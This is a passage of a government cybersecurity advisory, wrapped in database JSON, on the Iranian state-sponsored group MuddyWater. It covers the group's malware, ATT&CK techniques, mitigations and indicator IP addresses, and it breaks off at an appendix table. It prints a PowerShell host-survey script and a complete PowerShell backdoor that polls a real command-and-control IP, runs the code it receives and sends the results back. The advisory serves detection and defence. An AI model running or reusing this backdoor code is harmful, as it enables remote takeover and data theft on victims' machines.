"CVE-2022-42475", "CVE-2022-47966"], "modified": "2020-04-15T12:00:00", "id": "AA20-010A", "href": "https://www.cisa.gov/news-events/cybersecurity-advisories/aa20-010a", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-09-23T20:08:23", "description": "### Summary\n\n**Actions to Take Today to Protect Against Malicious Activity** \n* Search for indicators of compromise. \n* Use antivirus software. \n* [Patch](<https://us-cert.cisa.gov/ncas/tips/ST04-006>) all systems. \n* Prioritize patching [known exploited vulnerabilities](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>). \n* Train users to recognize and report [phishing attempts](<https://us-cert.cisa.gov/ncas/tips/ST04-014>). \n* Use [multi-factor authentication](<https://us-cert.cisa.gov/ncas/tips/ST05-012>).\n\n_**Note: **this advisory uses the MITRE Adversarial Tactics, Techniques, and Common Knowledge (ATT&amp;CK\u00ae) framework, version 10. See the [ATT&amp;CK for Enterprise](<https://attack.mitre.org/versions/v10/techniques/enterprise/>) for all referenced threat actor tactics and techniques._\n\nThe Federal Bureau of Investigation (FBI), the Cybersecurity and Infrastructure Security Agency (CISA), the U.S. Cyber Command Cyber National Mission Force (CNMF), and the United Kingdom\u2019s National Cyber Security Centre (NCSC-UK) have observed a group of Iranian government-sponsored advanced persistent threat (APT) actors, known as MuddyWater, conducting cyber espionage and other malicious cyber operations targeting a range of government and private-sector organizations across sectors\u2014including telecommunications, defense, local government, and oil and natural gas\u2014in Asia, Africa, Europe, and North America. **Note:** MuddyWater is also known as Earth Vetala, MERCURY, Static Kitten, Seedworm, and TEMP.Zagros.\n\nMuddyWater is a subordinate element within the Iranian Ministry of Intelligence and Security (MOIS).[[1](<https://www.cybercom.mil/Media/News/Article/2897570/iranian-intel-cyber-suite-of-malware-uses-open-source-tools/>)] This APT group has conducted broad cyber campaigns in support of MOIS objectives since approximately 2018. MuddyWater actors are positioned both to provide stolen data and accesses to the Iranian government and to share these with other malicious cyber actors.\n\nMuddyWater actors are known to exploit publicly reported vulnerabilities and use open-source tools and strategies to gain access to sensitive data on victims\u2019 systems and deploy ransomware. These actors also maintain persistence on victim networks via tactics such as side-loading dynamic link libraries (DLLs)\u2014to trick legitimate programs into running malware\u2014and obfuscating PowerShell scripts to hide command and control (C2) functions. FBI, CISA, CNMF, and NCSC-UK have observed MuddyWater actors recently using various malware\u2014variants of PowGoop, Small Sieve, Canopy (also known as Starwhale), Mori, and POWERSTATS\u2014along with other tools as part of their malicious activity. \n\nThis advisory provides observed tactics, techniques, and procedures (TTPs); malware; and indicators of compromise (IOCs) associated with this Iranian government-sponsored APT activity to aid organizations in the identification of malicious activity against sensitive networks. \n\nFBI, CISA, CNMF, NCSC-UK, and the National Security Agency (NSA) recommend organizations apply the mitigations in this advisory and review the following resources for additional information. **Note:** also see the Additional Resources section.\n\n * Malware Analysis Report \u2013 [MAR-10369127-1.v1: MuddyWater](<https://www.cisa.gov/uscert/ncas/analysis-reports/ar22-055a>)\n * IOCs \u2013 AA22-052A.stix and MAR-10369127-1.v1.stix\n * CISA's webpage \u2013 [Iran Cyber Threat Overview and Advisories](<https://www.cisa.gov/uscert/iran>)\n * [NCSC-UK MAR \u2013 Small Sieve](<https://www.ncsc.gov.uk/files/NCSC-Malware-Analysis-Report-Small-Sieve.pdf>)\n * [CNMF's press release \u2013 Iranian intel cyber suite of malware uses open source tools](<https://www.cybercom.mil/Media/News/Article/2897570/iranian-intel-cyber-suite-of-malware-uses-open-source-tools/>)\n\nClick here for a PDF version of this report.\n\n### Technical Details\n\nFBI, CISA, CNMF, and NCSC-UK have observed the Iranian government-sponsored MuddyWater APT group employing spearphishing, exploiting publicly known vulnerabilities, and leveraging multiple open-source tools to gain access to sensitive government and commercial networks. \n\nAs part of its spearphishing campaign, MuddyWater attempts to coax their targeted victim into downloading ZIP files, containing either an Excel file with a malicious macro that communicates with the actor\u2019s C2 server or a PDF file that drops a malicious file to the victim\u2019s network [[T1566.001](<https://attack.mitre.org/versions/v10/techniques/T1566/001/>), [T1204.002](<https://attack.mitre.org/versions/v10/techniques/T1204/002>)]. MuddyWater actors also use techniques such as side-loading DLLs [[T1574.002](<https://attack.mitre.org/versions/v10/techniques/T1574/002/>)] to trick legitimate programs into running malware and obfuscating PowerShell scripts [[T1059.001](<https://attack.mitre.org/versions/v10/techniques/T1059/001/>)] to hide C2 functions [[T1027](<https://attack.mitre.org/versions/v10/techniques/T1027/>)] (see the PowGoop section for more information). \n\nAdditionally, the group uses multiple malware sets\u2014including PowGoop, Small Sieve, Canopy/Starwhale, Mori, and POWERSTATS\u2014for loading malware, backdoor access, persistence [[TA0003](<https://attack.mitre.org/versions/v10/tactics/TA0003/>)], and exfiltration [[TA0010](<https://attack.mitre.org/versions/v10/tactics/TA0010/>)]. See below for descriptions of some of these malware sets, including newer tools or variants to the group\u2019s suite. Additionally, see Malware Analysis Report [MAR-10369127.r1.v1: MuddyWater](<https://www.cisa.gov/uscert/ncas/analysis-reports/ar22-055a>) for further details.\n\n#### **PowGoop**\n\nMuddyWater actors use new variants of PowGoop malware as their main loader in malicious operations; it consists of a DLL loader and a PowerShell-based downloader. The malicious file impersonates a legitimate file that is signed as a Google Update executable file.\n\nAccording to samples of PowGoop analyzed by [CISA](<https://www.cisa.gov/uscert/ncas/analysis-reports/ar22-055a>) and [CNMF](<https://www.cybercom.mil/Media/News/Article/2897570/iranian-intel-cyber-suite-of-malware-uses-open-source-tools/>), PowGoop consists of three components:\n\n * A DLL file renamed as a legitimate filename, `Goopdate.dll`, to enable the DLL side-loading technique [[T1574.002](<https://attack.mitre.org/versions/v10/techniques/T1574/002/>)]. The DLL file is contained within an executable, `GoogleUpdate.exe`. \n * A PowerShell script, obfuscated as a .dat file, `goopdate.dat`, used to decrypt and run a second obfuscated PowerShell script, `config.txt` [[T1059.001](<https://attack.mitre.org/versions/v10/techniques/T1059/001/>)].\n * `config.txt`, an encoded, obfuscated PowerShell script containing a beacon to a hardcoded IP address.\n\nThese components retrieve encrypted commands from a C2 server. The DLL file hides communications with MuddyWater C2 servers by executing with the Google Update service. \n\n#### **Small Sieve**\n\nAccording to a sample [analyzed by NCSC-UK](<https://www.ncsc.gov.uk/files/NCSC-Malware-Analysis-Report-Small-Sieve.pdf>), Small Sieve is a simple Python [[T1059.006](<https://attack.mitre.org/versions/v10/techniques/T1059/006/>)] backdoor distributed using a Nullsoft Scriptable Install System (NSIS) installer, `gram_app.exe`. The NSIS installs the Python backdoor, `index.exe`, and adds it as a registry run key [[T1547.001](<https://attack.mitre.org/versions/v10/techniques/T1547/001/>)], enabling persistence [[TA0003](<https://attack.mitre.org/versions/v10/tactics/TA0003/>)]. \n\nMuddyWater disguises malicious executables and uses filenames and Registry key names associated with Microsoft's Windows Defender to avoid detection during casual inspection. The APT group has also used variations of Microsoft (e.g., \"Microsift\") and Outlook in its filenames associated with Small Sieve [[T1036.005](<https://attack.mitre.org/versions/v10/techniques/T1036/005/>)].\n\nSmall Sieve provides basic functionality required to maintain and expand a foothold in victim infrastructure and avoid detection [[TA0005](<https://attack.mitre.org/versions/v10/tactics/TA0005/>)] by using custom string and traffic obfuscation schemes together with the Telegram Bot application programming interface (API). Specifically, Small Sieve\u2019s beacons and taskings are performed using Telegram API over Hypertext Transfer Protocol Secure (HTTPS) [[T1071.001](<https://attack.mitre.org/versions/v10/techniques/T1071/001>)], and the tasking and beaconing data is obfuscated through a hex byte swapping encoding scheme combined with an obfuscated Base64 function [[T1027](<https://attack.mitre.org/versions/v10/techniques/T1027>)], [T1132.002](<https://attack.mitre.org/versions/v10/techniques/T1132/002/>)].\n\n**Note:** cybersecurity agencies in the United Kingdom and the United States attribute Small Sieve to MuddyWater with high confidence. \n\nSee Appendix B for further analysis of Small Sieve malware.\n\n#### **Canopy**\n\nMuddyWater also uses Canopy/Starwhale malware, likely distributed via spearphishing emails with targeted attachments [[T1566.001](<https://attack.mitre.org/versions/v10/techniques/T1566/001>)]. According to two Canopy/Starwhale samples analyzed by CISA, Canopy uses Windows Script File (.wsf) scripts distributed by a malicious Excel file. **Note:** the cybersecurity agencies of the United Kingdom and the United States attribute these malware samples to MuddyWater with high confidence. \n\nIn the samples CISA analyzed, a malicious Excel file, `Cooperation terms.xls`, contained macros written in Visual Basic for Applications (VBA) and two encoded Windows Script Files. When the victim opens the Excel file, they receive a prompt to enable macros [[T1204.002](<https://attack.mitre.org/versions/v10/techniques/T1204/002/>)]. Once this occurs, the macros are executed, decoding and installing the two embedded Windows Script Files.\n\nThe first .wsf is installed in the current user startup folder [[T1547.001](<https://attack.mitre.org/versions/v10/techniques/T1547/001/>)] for persistence. The file contains hexadecimal (hex)-encoded strings that have been reshuffled [[T1027](<https://attack.mitre.org/versions/v10/techniques/T1027/>)]. The file executes a command to run the second .wsf.\n\nThe second .wsf also contains hex-encoded strings that have been reshuffled. This file collects [[TA0035](<https://attack.mitre.org/versions/v10/tactics/TA0035/>)] the victim system\u2019s IP address, computer name, and username [[T1005](<https://attack.mitre.org/versions/v10/techniques/T1005/>)]. The collected data is then hex-encoded and sent to an adversary-controlled IP address, `http[:]88.119.170[.]124`, via an HTTP POST request [[T1041](<https://attack.mitre.org/versions/v10/techniques/T1041/>)].\n\n#### **Mori**\n\nMuddyWater also uses the Mori backdoor that uses Domain Name System tunneling to communicate with the group\u2019s C2 infrastructure [[T1572](<https://attack.mitre.org/versions/v10/techniques/T1572/>)]. \n\nAccording to one sample analyzed by CISA, `FML.dll`, Mori uses a DLL written in C++ that is executed with `regsvr32.exe` with export `DllRegisterServer`; this DLL appears to be a component to another program. `FML.dll` contains approximately 200MB of junk data [[T1001.001](<https://attack.mitre.org/versions/v10/techniques/T1001/001/>)] in a resource directory 205, number 105. Upon execution, `FML.dll` creates a mutex, `0x50504060`, and performs the following tasks:\n\n * Deletes the file `FILENAME.old` and deletes file by registry value. The filename is the DLL file with a `.old` extension.\n * Resolves networking APIs from strings that are ADD-encrypted with the key` 0x05`.\n * Uses Base64 and Java Script Object Notation (JSON) based on certain key values passed to the JSON library functions. It appears likely that JSON is used to serialize C2 commands and/or their results.\n * Communicates using HTTP over either IPv4 or IPv6, depending on the value of an unidentified flag, for C2 [[T1071.001](<https://attack.mitre.org/versions/v10/techniques/T1071/001/>)].\n * Reads and/or writes data from the following Registry Keys, `HKLM\\Software\\NFC\\IPA` and `HKLM\\Software\\NFC\\(Default)`.\n\n#### **POWERSTATS**\n\nThis group is also known to use the POWERSTATS backdoor, which runs PowerShell scripts to maintain persistent access to the victim systems [[T1059.001](<https://attack.mitre.org/versions/v10/techniques/T1059>)]. \n\nCNMF has posted samples further detailing the different parts of MuddyWater\u2019s new suite of tools\u2014 along with JavaScript files used to establish connections back to malicious infrastructure\u2014to the malware aggregation tool and repository, [Virus Total](<http://www.virustotal.com/en/user/CYBERCOM_Malware_Alert>). Network operators who identify multiple instances of the tools on the same network should investigate further as this may indicate the presence of an Iranian malicious cyber actor.\n\nMuddyWater actors are also known to exploit unpatched vulnerabilities as part of their targeted operations. FBI, CISA, CNMF, and NCSC-UK have observed this APT group recently exploiting the Microsoft Netlogon elevation of privilege vulnerability ([CVE-2020-1472](<https://vulners.com/cve/CVE-2020-1472>)) and the Microsoft Exchange memory corruption vulnerability ([CVE-2020-0688](<https://vulners.com/cve/CVE-2020-0688>)). See [CISA\u2019s Known Exploited Vulnerabilities Catalog](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>) for additional vulnerabilities with known exploits and joint Cybersecurity Advisory: [Iranian Government-Sponsored APT Cyber Actors Exploiting Microsoft Exchange and Fortinet Vulnerabilities](<https://www.cisa.gov/uscert/ncas/alerts/aa21-321a>) for additional Iranian APT group-specific vulnerability exploits.\n\n#### **Survey Script**\n\nThe following script is an example of a survey script used by MuddyWater to enumerate information about victim computers. It queries the Windows Management Instrumentation (WMI) service to obtain information about the compromised machine to generate a string, with these fields separated by a delimiter (e.g., `;;` in this sample). The produced string is usually encoded by the MuddyWater implant and sent to an adversary-controlled IP address.\n\n$O = Get-WmiObject Win32_OperatingSystem;$S = $O.Name;$S += \";;\";$ips = \"\";Get-WmiObject Win32_NetworkAdapterConfiguration -Filter \"IPEnabled=True\" | % {$ips = $ips + \", \" + $_.IPAddress[0]};$S += $ips.substring(1);$S += \";;\";$S += $O.OSArchitecture;$S += \";;\";$S += [System.Net.DNS]::GetHostByName('').HostName;$S += \";;\";$S += ((Get-WmiObject Win32_ComputerSystem).Domain);$S += \";;\";$S += $env:UserName;$S += \";;\";$AntiVirusProducts = Get-WmiObject -Namespace \"root\\SecurityCenter2\" -Class AntiVirusProduct -ComputerName $env:computername;$resAnti = @();foreach($AntiVirusProduct in $AntiVirusProducts){$resAnti += $AntiVirusProduct.displayName};$S += $resAnti;echo $S;\n\n#### **Newly Identified PowerShell Backdoor**\n\nThe newly identified PowerShell backdoor used by MuddyWater below uses a single-byte Exclusive-OR (XOR) to encrypt communications with the key 0x02 to adversary-controlled infrastructure. The script is lightweight in functionality and uses the InvokeScript method to execute responses received from the adversary.\n\nfunction encode($txt,$key){$enByte = [Text.Encoding]::UTF8.GetBytes($txt);for($i=0; $i -lt $enByte.count ; $i++){$enByte[$i] = $enByte[$i] -bxor $key;}$encodetxt = [Convert]::ToBase64String($enByte);return $encodetxt;}function decode($txt,$key){$enByte = [System.Convert]::FromBase64String($txt);for($i=0; $i -lt $enByte.count ; $i++){$enByte[$i] = $enByte[$i] -bxor $key;}$dtxt = [System.Text.Encoding]::UTF8.GetString($enByte);return $dtxt;}$global:tt=20;while($true){try{$w = [System.Net.HttpWebRequest]::Create('http://95.181.161.49:80/index.php?id=&lt;victim identifier&gt;');$w.proxy = [Net.WebRequest]::GetSystemWebProxy();$r=(New-Object System.IO.StreamReader($w.GetResponse().GetResponseStream())).ReadToEnd();if($r.Length -gt 0){$res=[string]$ExecutionContext.InvokeCommand.InvokeScript(( decode $r 2));$wr = [System.Net.HttpWebRequest]::Create('http://95.181.161.49:80/index.php?id=&lt;victim identifier&gt;');$wr.proxy = [Net.WebRequest]::GetSystemWebProxy();$wr.Headers.Add('cookie',(encode $res 2));$wr.GetResponse().GetResponseStream();}}catch {}Start-Sleep -Seconds $global:tt;}\n\n### MITRE ATT&amp;CK Techniques\n\n[MuddyWater](<https://attack.mitre.org/groups/G0069/>) uses the ATT&amp;CK techniques listed in table 1.\n\n_Table 1: MuddyWater ATT&amp;CK Techniques[[2](<https://attack.mitre.org/versions/v10/groups/G0069/>)]_\n\nTechnique Title | **ID** | **Use** \n---|---|--- \n**Reconnaissance** \nGather Victim Identity Information: Email Addresses | [T1589.002](<https://attack.mitre.org/versions/v10/techniques/T1589/002>) | MuddyWater has specifically targeted government agency employees with spearphishing emails. \n**Resource Development** \nAcquire Infrastructure: Web Services | [T1583.006](<https://attack.mitre.org/versions/v10/techniques/T1583/006/>) | MuddyWater has used file sharing services including OneHub to distribute tools. \nObtain Capabilities: Tool | [T1588.002](<https://attack.mitre.org/versions/v10/techniques/T1588/002>) | MuddyWater has made use of legitimate tools ConnectWise and RemoteUtilities for access to target environments. \n**Initial Access** \nPhishing: Spearphishing Attachment | [T1566.001](<https://attack.mitre.org/versions/v10/techniques/T1566/001>) | MuddyWater has compromised third parties and used compromised accounts to send spearphishing emails with targeted attachments. \nPhishing: Spearphishing Link | [T1566.002](<https://attack.mitre.org/versions/v10/techniques/T1566/002>) | MuddyWater has sent targeted spearphishing emails with malicious links. \n**Execution** \nWindows Management Instrumentation | [T1047](<https://attack.mitre.org/versions/v10/techniques/T1047>) | MuddyWater has used malware that leveraged Windows Management Instrumentation for execution and querying host information. \nCommand and Scripting Interpreter: PowerShell | [T1059.001](<https://attack.mitre.org/versions/v10/techniques/T1059/001/>) | MuddyWater has used PowerShell for execution. \nCommand and Scripting Interpreter: Windows Command Shell | [1059.003](<https://attack.mitre.org/versions/v10/techniques/T1059/003>) | MuddyWater has used a custom tool for creating reverse shells. \nCommand and Scripting Interpreter: Visual Basic | [T1059.005](<https://attack.mitre.org/versions/v10/techniques/T1059/005>) | MuddyWater has used Virtual Basic Script (VBS) files to execute its POWERSTATS payload, as well as macros. \nCommand and Scripting Interpreter: Python | [T1059.006](<https://attack.mitre.org/versions/v10/techniques/T1059/006>) | MuddyWater has used developed tools in Python including Out1. \nCommand and Scripting Interpreter: JavaScript | [T1059.007](<https://attack.mitre.org/versions/v10/techniques/T1059/007>) | MuddyWater has used JavaScript files to execute its POWERSTATS payload. \nExploitation for Client Execution | [T1203](<https://attack.mitre.org/versions/v10/techniques/T1203>) | MuddyWater has exploited the Office vulnerability CVE-2017-0199 for execution. \nUser Execution: Malicious Link | [T1204.001](<https://attack.mitre.org/versions/v10/techniques/T1204/001>) | MuddyWater has distributed URLs in phishing emails that link to lure documents. \nUser Execution: Malicious File | [T1204.002](<https://attack.mitre.org/versions/v10/techniques/T1204/002>) | MuddyWater has attempted to get users to enable macros and launch malicious Microsoft Word documents delivered via spearphishing emails. \nInter-Process Communication: Component Object Model | [T1559.001](<https://attack.mitre.org/versions/v10/techniques/T1559/001>) | MuddyWater has used malware that has the capability to execute malicious code via COM, DCOM, and Outlook. \nInter-Process Communication: Dynamic Data Exchange | [T1559.002](<https://attack.mitre.org/versions/v10/techniques/T1559/002>) | MuddyWater has used malware that can execute PowerShell scripts via Dynamic Data Exchange. \n**Persistence** \nScheduled Task/Job: Scheduled Task | [T1053.005](<https://attack.mitre.org/versions/v10/techniques/T1053/005>) | MuddyWater has used scheduled tasks to establish persistence. \nOffice Application Startup: Office Template Macros | [T1137.001](<https://attack.mitre.org/versions/v10/techniques/T1137/001>) | MuddyWater has used a Word Template, `Normal.dotm`, for persistence. \nBoot or Logon Autostart Execution: Registry Run Keys / Startup Folder | [T1547.001](<https://attack.mitre.org/versions/v10/techniques/T1547/001/>) | MuddyWater has added Registry Run key `KCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\SystemTextEncoding` to establish persistence. \n**Privilege Escalation** \nAbuse Elevation Control Mechanism: Bypass User Account Control | [T1548.002](<https://attack.mitre.org/versions/v10/techniques/T1548/002/>) | MuddyWater uses various techniques to bypass user account control. \nCredentials from Password Stores | [T1555](<https://attack.mitre.org/versions/v10/techniques/T1555>) | MuddyWater has performed credential dumping with LaZagne and other tools, including by dumping passwords saved in victim email. \nCredentials from Web Browsers | \n\n[T1555.003](<https://attack.mitre.org/versions/v10/techniques/T1055/003>)\n\n| MuddyWater has run tools including Browser64 to steal passwords saved in victim web browsers. \n**Defense Evasion** \nObfuscated Files or Information | [T1027](<https://attack.mitre.org/versions/v10/techniques/T1027>) | MuddyWater has used Daniel Bohannon\u2019s Invoke-Obfuscation framework and obfuscated PowerShell scripts. The group has also used other obfuscation methods, including Base64 obfuscation of VBScripts and PowerShell commands. \nSteganography | [T1027.003](<https://attack.mitre.org/versions/v10/techniques/T1027/003>) | MuddyWater has stored obfuscated JavaScript code in an image file named `temp.jpg`. \nCompile After Delivery | [T1027.004](<https://attack.mitre.org/versions/v10/techniques/T1027/004>) | MuddyWater has used the` .NET` `csc.exe` tool to compile executables from downloaded C# code. \nMasquerading: Match Legitimate Name or Location | [T1036.005](<https://attack.mitre.org/versions/v10/techniques/T1036/005>) | MuddyWater has disguised malicious executables and used filenames and Registry key names associated with Windows Defender. E.g., Small Sieve uses variations of Microsoft (Microsift) and Outlook in its filenames to attempt to avoid detection during casual inspection. \nDeobfuscate/Decode Files or Information | \n\n[T1140](<https://attack.mitre.org/versions/v10/techniques/T1140>)\n\n| MuddyWater decoded Base64-encoded PowerShell commands using a VBS file. \nSigned Binary Proxy Execution: CMSTP | \n\n[T1218.003](<https://attack.mitre.org/versions/v10/techniques/T1218/003>)\n\n| MuddyWater has used `CMSTP.exe` and a malicious `.INF` file to execute its POWERSTATS payload. \nSigned Binary Proxy Execution: Mshta | [T1218.005](<https://attack.mitre.org/versions/v10/techniques/T1218/005>) | MuddyWater has used `mshta.exe` to execute its POWERSTATS payload and to pass a PowerShell one-liner for execution. \nSigned Binary Proxy Execution: Rundll32 | [T1218.011](<https://attack.mitre.org/versions/v10/techniques/T1218/011>) | MuddyWater has used malware that leveraged `rundll32.exe` in a Registry Run key to execute a `.dll`. \nExecution Guardrails | [T1480](<https://attack.mitre.org/versions/v10/techniques/T1480/>) | The Small Sieve payload used by MuddyWater will only execute correctly if the word \u201cPlatypus\u201d is passed to it on the command line. \nImpair Defenses: Disable or Modify Tools | [T1562.001](<https://attack.mitre.org/versions/v10/techniques/T1562/001>) | MuddyWater can disable the system's local proxy settings. \n**Credential Access** \nOS Credential Dumping: LSASS Memory | [T1003.001](<https://attack.mitre.org/versions/v10/techniques/T1003/001>) | MuddyWater has performed credential dumping with Mimikatz and `procdump64.exe`. \nOS Credential Dumping: LSA Secrets | \n\n[T1003.004](<https://attack.mitre.org/versions/v10/techniques/T1003/004>)\n\n| MuddyWater has performed credential dumping with LaZagne. \nOS Credential Dumping: Cached Domain Credentials | [T1003.005](<https://attack.mitre.org/versions/v10/techniques/T1003/005>) | MuddyWater has performed credential dumping with LaZagne. \nUnsecured Credentials: Credentials In Files | \n\n[T1552.001](<https://attack.mitre.org/versions/v10/techniques/T1552/001>)\n\n| MuddyWater has run a tool that steals passwords saved in victim email. \n**Discovery** \nSystem Network Configuration Discovery | [T1016](<https://attack.mitre.org/versions/v10/techniques/T1016>) | MuddyWater has used malware to collect the victim\u2019s IP address and domain name. \nSystem Owner/User Discovery | [T1033](<https://attack.mitre.org/versions/v10/techniques/T1033>) | MuddyWater has used malware that can collect the victim\u2019s username. \nSystem Network Connections Discovery | [T1049](<https://attack.mitre.org/versions/v10/techniques/T1049>) | MuddyWater has used a PowerShell backdoor to check for Skype connections on the target machine. \nProcess Discovery | [T1057](<https://attack.mitre.org/versions/v10/techniques/T1057>) | MuddyWater has used malware to obtain a list of running processes on the system. \nSystem Information Discovery | \n\n[T1082](<https://attack.mitre.org/versions/v10/techniques/T1082>)\n\n| MuddyWater has used malware that can collect the victim\u2019s OS version and machine name. \nFile and Directory Discovery | [T1083](<https://attack.mitre.org/versions/v10/techniques/T1083>) | MuddyWater has used malware that checked if the ProgramData folder had folders or files with the keywords \"Kasper,\" \"Panda,\" or \"ESET.\" \nAccount Discovery: Domain Account | [T1087.002](<https://attack.mitre.org/versions/v10/techniques/T1087/002/>) | MuddyWater has used `cmd.exe` net user/domain to enumerate domain users. \nSoftware Discovery | [T1518](<https://attack.mitre.org/versions/v10/techniques/T1518>) | MuddyWater has used a PowerShell backdoor to check for Skype connectivity on the target machine. \nSecurity Software Discovery | [T1518.001](<https://attack.mitre.org/versions/v10/techniques/T1518/001>) | MuddyWater has used malware to check running processes against a hard-coded list of security tools often used by malware researchers. \n**Collection** \nScreen Capture | [T1113](<https://attack.mitre.org/versions/v10/techniques/T1113>) | MuddyWater has used malware that can capture screenshots of the victim\u2019s machine. \n \nArchive Collected Data: Archive via Utility\n\n| [T1560.001](<https://attack.mitre.org/versions/v10/techniques/T1560/001/>) | MuddyWater has used the native Windows cabinet creation tool, `makecab.exe`, likely to compress stolen data to be uploaded. \n**Command and Control** \nApplication Layer Protocol: Web Protocols | [T1071.001](<https://attack.mitre.org/versions/v10/techniques/T1071/001/>) | MuddyWater has used HTTP for C2 communications. e.g., Small Sieve beacons and tasking are performed using the Telegram API over HTTPS. \nProxy: External Proxy | [T1090.002](<https://attack.mitre.org/versions/v10/techniques/T1090/002>) | \n\nMuddyWater has controlled POWERSTATS from behind a proxy network to obfuscate the C2 location. \n\nMuddyWater has used a series of compromised websites that victims connected to randomly to relay information to C2. \n \nWeb Service: Bidirectional Communication | [T1102.002](<https://attack.mitre.org/versions/v10/techniques/T1102/002>) | MuddyWater has used web services including OneHub to distribute remote access tools. \nMulti-Stage Channels | [T1104](<https://attack.mitre.org/versions/v10/techniques/T1104>) | MuddyWater has used one C2 to obtain enumeration scripts and monitor web logs, but a different C2 to send data back. \nIngress Tool Transfer | [T1105](<https://attack.mitre.org/versions/v10/techniques/T1105>) | MuddyWater has used malware that can upload additional files to the victim\u2019s machine. \nData Encoding: Standard Encoding | [T1132.001](<https://attack.mitre.org/versions/v10/techniques/T1132/001/>) | MuddyWater has used tools to encode C2 communications including Base64 encoding. \nData Encoding: Non-Standard Encoding | [T1132.002](<https://attack.mitre.org/versions/v10/techniques/T1132/002/>) | MuddyWater uses tools such as Small Sieve, which employs a custom hex byte swapping encoding scheme to obfuscate tasking traffic. \nRemote Access Software | [T1219](<https://attack.mitre.org/versions/v10/techniques/T1219>) | MuddyWater has used a legitimate application, ScreenConnect, to manage systems remotely and move laterally. \n**Exfiltration** \nExfiltration Over C2 Channel | [T1041](<https://attack.mitre.org/versions/v10/techniques/T1041>) | MuddyWater has used C2 infrastructure to receive exfiltrated data. \n \n### Mitigations\n\n#### Protective Controls and Architecture\n\n * **Deploy application control software to limit the applications and executable code that can be run by users. **Email attachments and files downloaded via links in emails often contain executable code. \n\n#### Identity and Access Management\n\n * **Use multifactor authentication where possible,** particularly for webmail, virtual private networks, and accounts that access critical systems. \n * **Limit the use of administrator privileges.** Users who browse the internet, use email, and execute code with administrator privileges make for excellent spearphishing targets because their system\u2014once infected\u2014enables attackers to move laterally across the network, gain additional accesses, and access highly sensitive information. \n\n#### Phishing Protection\n\n * **Enable antivirus and anti-malware software and update signature definitions in a timely manner.** Well-maintained antivirus software may prevent use of commonly deployed attacker tools that are delivered via spearphishing. \n * **Be suspicious of unsolicited contact via email or social media from any individual you do not know personally.** Do not click on hyperlinks or open attachments in these communications.\n * **Consider adding an email banner to emails received from outside your organization and disabling hyperlinks in received emails.**\n * **Train users through awareness and simulations to recognize and report phishing and social engineering attempts.** Identify and suspend access of user accounts exhibiting unusual activity.\n * **Adopt threat reputation services at the network device, operating system, application, and email service levels. **Reputation services can be used to detect or prevent low-reputation email addresses, files, URLs, and IP addresses used in spearphishing attacks. \n\n#### Vulnerability and Configuration Management\n\n * **Install updates/patch operating systems, software, and firmware as soon as updates/patches are released. **Prioritize patching [known exploited vulnerabilities](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>).\n\n### Additional Resources\n\n * For more information on Iranian government-sponsored malicious cyber activity, see [CISA's webpage \u2013 Iran Cyber Threat Overview and Advisories](<https://www.us-cert.cisa.gov/iran>) and [CNMF's press release \u2013 Iranian intel cyber suite of malware uses open source tools](<https://www.cybercom.mil/Media/News/Article/2897570/iranian-intel-cyber-suite-of-malware-uses-open-source-tools/>). \n * For information and resources on protecting against and responding to ransomware, refer to [StopRansomware.gov](<https://www.cisa.gov/stopransomware/>), a centralized, whole-of-government webpage providing ransomware resources and alerts.\n * The joint advisory from the cybersecurity authorities of Australia, Canada, New Zealand, the United Kingdom, and the United States: [Technical Approaches to Uncovering and Remediating Malicious Activity](<https://us-cert.cisa.gov/sites/default/files/publications/AA20-245A-Joint_CSA-Technical_Approaches_to_Uncovering_Malicious_Activity_508.pdf>) provides additional guidance when hunting or investigating a network and common mistakes to avoid in incident handling.\n * CISA offers a range of no-cost [cyber hygiene services](<https://www.cisa.gov/cyber-hygiene-services>) to help critical infrastructure organizations assess, identify, and reduce their exposure to threats, including ransomware. By requesting these services, organizations of any size could find ways to reduce their risk and mitigate attack vectors.\n * The U.S. Department of State\u2019s Rewards for Justice (RFJ) program offers a reward of up to $10 million for reports of foreign government malicious activity against U.S. critical infrastructure. See the [RFJ](<https://rewardsforjustice.net/rewards/foreign-malicious-cyber-activity-against-u-s-critical-infrastructure/>) website for more information and how to report information securely.\n\n### References\n\n[[1] CNMF Article: Iranian Intel Cyber Suite of Malware Uses Open Source Tools](<https://www.cybercom.mil/Media/News/Article/2897570/iranian-intel-cyber-suite-of-malware-uses-open-source-tools/>) \n[[2] MITRE ATT&amp;CK: MuddyWater ](<https://attack.mitre.org/versions/v10/groups/G0069/>)\n\n### Caveats\n\nThe information you have accessed or received is being provided \u201cas is\u201d for informational purposes only. The FBI, CISA, CNMF, and NSA do not endorse any commercial product or service, including any subjects of analysis. Any reference to specific commercial products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply their endorsement, recommendation, or favoring by the FBI, CISA, CNMF, or NSA.\n\n### Purpose\n\nThis document was developed by the FBI, CISA, CNMF, NCSC-UK, and NSA in furtherance of their respective cybersecurity missions, including their responsibilities to develop and issue cybersecurity specifications and mitigations. This information may be shared broadly to reach all appropriate stakeholders. The United States\u2019 NSA agrees with this attribution and the details provided in this report.\n\n### Appendix A: IOCs\n\nThe following IP addresses are associated with MuddyWater activity:\n\n`5.199.133[.]149 \n45.142.213[.]17 \n45.142.212[.]61 \n45.153.231[.]104 \n46.166.129[.]159 \n80.85.158[.]49 \n87.236.212[.]22 \n88.119.170[.]124 \n88.119.171[.]213 \n89.163.252[.]232 \n95.181.161[.]49 \n95.181.161[.]50 \n164.132.237[.]65 \n185.25.51[.]108 \n185.45.192[.]228 \n185.117.75[.]34 \n185.118.164[.]21 \n185.141.27[.]143 \n185.141.27[.]248 \n185.183.96[.]7 \n185.183.96[.]44 \n192.210.191[.]188 \n192.210.226[.]128`\n\n### Appendix B: Small Sieve\n\n**Note:** the information contained in this appendix is from NCSC-UK analysis of a Small Sieve sample.\n\n#### **Metadata**\n\n_Table 2: Gram.app.exe Metadata_\n\nFilename | gram_app.exe** ** \n---|--- \n**Description** | NSIS installer that installs and runs the index.exe backdoor and adds a persistence registry key \n**Size** | 16999598 bytes \n**MD5** | 15fa3b32539d7453a9a85958b77d4c95 \n**SHA-1** | 11d594f3b3cf8525682f6214acb7b7782056d282 \n**SHA-256** | b75208393fa17c0bcbc1a07857686b8c0d7e0471d00a167a07fd0d52e1fc9054 \n**Compile Time** | 2021-09-25 21:57:46 UTC \n \n_Table 3: 